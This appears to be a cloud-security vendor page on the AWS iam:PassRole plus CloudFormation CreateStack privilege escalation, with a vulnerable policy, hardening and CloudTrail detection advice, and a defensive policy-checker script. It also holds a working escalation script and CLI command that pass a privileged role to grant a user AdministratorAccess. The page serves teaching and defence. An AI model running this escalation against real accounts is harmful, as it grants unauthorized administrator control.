Severity: Critical

iam:PassRole + CloudFormation Privilege Escalation

When a stack is created with a service role, CloudFormation assumes that role and makes every API call in the template with the role's permissions, not the caller's. With iam:PassRole and cloudformation:CreateStack, an attacker passes a privileged role and deploys a template that does whatever that role allows, including granting themselves admin.

Permissions an attacker needs

  • iam:PassRole
  • cloudformation:CreateStack

How the escalation works

  • The attacker finds a privileged role they are allowed to pass (for example one with IAM or admin permissions) and whose trust policy allows cloudformation.amazonaws.com to assume it.
  • They create a stack with --role-arn set to that role and a template whose resources perform privileged IAM actions, for example granting their own user administrator access (via a group that carries AdministratorAccess, or an inline policy); because the template contains IAM resources, the call must acknowledge them with --capabilities CAPABILITY_IAM or CAPABILITY_NAMED_IAM.
  • CloudFormation assumes the passed role and carries out every create call in the template with that role's permissions; the caller never needs those permissions directly.
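
The two pieces the steps above leave implicit are the template (the escalate.json referenced by the CLI example further down) and the create-stack call. The following is an added example, not code from this page or from Shieldly: it builds a template that adds an existing user to a new group carrying AdministratorAccess, writes it to disk, and maps the CLI flags onto boto3's create_stack. The account ID, the role name privileged-role and the user name attacker are placeholders for an account you are authorized to test.

```python
"""Template and create-stack call for the iam:PassRole + CreateStack escalation.

Added example, not code from the page or from Shieldly. The account ID,
role name and IAM user name below are placeholders for an authorized test
account.
"""
import json

ACCOUNT_ID = "123456789012"                      # placeholder account
ATTACKER_USER = "attacker"                       # assumed name of the caller's IAM user
PRIVILEGED_ROLE_ARN = f"arn:aws:iam::{ACCOUNT_ID}:role/privileged-role"
ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"


def build_escalation_template(user_name: str) -> dict:
    """Template that grants an existing IAM user AdministratorAccess.

    CloudFormation has no resource that attaches a managed policy straight
    onto an existing user, so the template creates a group that carries
    AdministratorAccess and adds the user to it. Both are IAM resources,
    so the stack must be created with CAPABILITY_IAM or CAPABILITY_NAMED_IAM.
    Every call here runs with the passed service role's permissions.
    """
    return {
        "AWSTemplateFormatVersion": "2010-09-09",
        "Resources": {
            "AdminGroup": {
                "Type": "AWS::IAM::Group",
                "Properties": {"ManagedPolicyArns": [ADMIN_POLICY_ARN]},
            },
            "AddUser": {
                "Type": "AWS::IAM::UserToGroupAddition",
                "Properties": {
                    "GroupName": {"Ref": "AdminGroup"},   # Ref on a group yields its name
                    "Users": [user_name],
                },
            },
        },
    }


def write_template(path: str, user_name: str = ATTACKER_USER) -> str:
    """Write the template so it can be passed as --template-body file://<path>."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(build_escalation_template(user_name), fh, indent=2)
    return path


def create_stack_request(stack_name: str, template: dict, role_arn: str) -> dict:
    """Keyword arguments for boto3's CloudFormation create_stack. They map 1:1
    onto the CLI flags: --role-arn is RoleARN, --capabilities is Capabilities."""
    return {
        "StackName": stack_name,
        "TemplateBody": json.dumps(template),
        "RoleARN": role_arn,
        "Capabilities": ["CAPABILITY_NAMED_IAM"],
    }


def escalate(stack_name: str = "esc", user_name: str = ATTACKER_USER,
             role_arn: str = PRIVILEGED_ROLE_ARN) -> str:
    """Create the stack with the privileged role and return its StackId.

    Needs credentials holding iam:PassRole on role_arn plus
    cloudformation:CreateStack; the role's trust policy must allow
    cloudformation.amazonaws.com to assume it.
    """
    import boto3  # imported lazily so the template helpers work without boto3 installed
    cfn = boto3.client("cloudformation")
    request = create_stack_request(stack_name, build_escalation_template(user_name), role_arn)
    return cfn.create_stack(**request)["StackId"]


if __name__ == "__main__":
    print("wrote", write_template("escalate.json"))
    # escalate()  # only in an account you are authorized to test
```

Running the script writes escalate.json, which is exactly what the create-stack command on this page consumes; escalate() is the same request made through boto3 instead of the CLI.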

Example vulnerable policy

A policy like this grants the dangerous permission. Paste your own policy into the free AI-Powered IAM analyzer to see if you are exposed.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "iam:PassRole",
        "cloudformation:CreateStack"
      ],
      "Resource": "*"
    }
  ]
}

Example exploitation

For illustration only — run against accounts you own or are authorized to test.

aws cloudformation create-stack \
  --stack-name esc \
  --template-body file://escalate.json \
  --role-arn arn:aws:iam::123456789012:role/privileged-role \
  --capabilities CAPABILITY_NAMED_IAM

How to detect and prevent it

  • Scope iam:PassRole to the specific roles CloudFormation needs and add a condition of iam:PassedToService equal to cloudformation.amazonaws.com, so the grant cannot be reused to pass those roles to other services.
  • Use least-privileged CloudFormation service roles scoped to the resources a stack legitimately manages; a service role that can create IAM principals or attach policies is the escalation target.
  • Review who can pass roles to CloudFormation; treat that permission as equivalent to the passed roles' permissions, even when it is scoped to named roles.
  • For detection, alert on CloudTrail CreateStack and UpdateStack events whose requestParameters.roleARN names a privileged role, especially from principals that do not normally deploy stacks.
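
A checker for the condition the first bullet describes, as an added example that is not Shieldly's analyzer or any AWS tool: it walks a policy document's Allow statements, resolves action wildcards, and reports a PassRole grant as open to CloudFormation unless an iam:PassedToService condition excludes cloudformation.amazonaws.com. The sample policies are constructed here; the role name cfn-deploy-role is assumed. In line with the third bullet, a PassRole grant scoped to named roles still yields a REVIEW finding rather than a clean result. NotAction, Deny, resource-level matching and other condition keys are not modelled.

```python
"""Flag IAM policies that open the iam:PassRole + cloudformation:CreateStack path.

Added example, not Shieldly's analyzer. Sample policies are constructed
inline; the role name cfn-deploy-role is an assumption.
"""
import fnmatch

CFN_SERVICE = "cloudformation.amazonaws.com"


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _action_matches(pattern: str, action: str) -> bool:
    # IAM action names are matched case-insensitively; * and ? are wildcards.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def allow_statements(policy: dict, action: str) -> list:
    """Allow statements whose Action list covers `action` (NotAction is ignored)."""
    return [
        s for s in _as_list(policy["Statement"])
        if s.get("Effect") == "Allow"
        and any(_action_matches(p, action) for p in _as_list(s.get("Action", [])))
    ]


def passrole_reaches_cloudformation(stmt: dict) -> bool:
    """Can the role be passed to CloudFormation under this statement's Condition?

    Only iam:PassedToService under StringEquals / StringLike operators (and
    their ...IfExists / ForAnyValue variants) is evaluated. An absent key
    means any service may receive the role, so the statement counts as open.
    """
    for operator, keys in stmt.get("Condition", {}).items():
        op = operator.lower()
        for key, values in keys.items():
            if key.lower() != "iam:passedtoservice":
                continue
            if "stringlike" in op:
                return any(fnmatch.fnmatchcase(CFN_SERVICE, v) for v in _as_list(values))
            if "stringequals" in op:
                return CFN_SERVICE in _as_list(values)
    return True


def find_cloudformation_passrole_path(policy: dict) -> list:
    """One finding per PassRole statement that is usable together with CreateStack."""
    if not allow_statements(policy, "cloudformation:CreateStack"):
        return []
    findings = []
    for stmt in allow_statements(policy, "iam:PassRole"):
        if not passrole_reaches_cloudformation(stmt):
            continue
        resources = _as_list(stmt.get("Resource", "*"))
        if "*" in resources:
            findings.append("CRITICAL: iam:PassRole on any role + cloudformation:CreateStack")
        else:
            findings.append("REVIEW: iam:PassRole to CloudFormation for "
                            + ", ".join(resources)
                            + " (equivalent to those roles' permissions)")
    return findings


# Constructed sample policies. VULNERABLE is the policy shown on this page.
VULNERABLE = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow",
                   "Action": ["iam:PassRole", "cloudformation:CreateStack"],
                   "Resource": "*"}],
}

# Hardened: one named role (assumed name), and only when CloudFormation is the consumer.
HARDENED = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "cloudformation:CreateStack", "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/cfn-deploy-role",
         "Condition": {"StringEquals": {"iam:PassedToService": CFN_SERVICE}}},
    ],
}

# PassRole restricted to a different service: CreateStack alone gives no path.
UNRELATED = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "cloudformation:CreateStack", "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*",
         "Condition": {"StringEquals": {"iam:PassedToService": "ec2.amazonaws.com"}}},
    ],
}

if __name__ == "__main__":
    for name, policy in [("vulnerable", VULNERABLE), ("hardened", HARDENED), ("unrelated", UNRELATED)]:
        print(name, find_cloudformation_passrole_path(policy) or ["no finding"])
```

The checker deliberately treats a missing iam:PassedToService condition as open, and treats "*" or "iam:*" in Action the same as an explicit iam:PassRole, since both are what the page's analyzer flags as wildcards.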

FAQ

Does this work without a service role?

Without --role-arn, CloudFormation uses a temporary session derived from the caller's own credentials, so the stack can only do what the caller could already do and there is no escalation. The risk comes specifically from passing a service role that is more privileged than the caller.

Check your IAM policies for this — free

Shieldly's AI-Powered analyzer flags privilege-escalation paths, wildcards, and risky PassRole in seconds. No signup, no AWS credentials. Also ships as CLI, VS Code extension, GitHub Action, and CDK Guard.

Amazon Web Services (AWS) is a trademark of Amazon.com, Inc. Shieldly is not affiliated with, endorsed by, or sponsored by Amazon Web Services.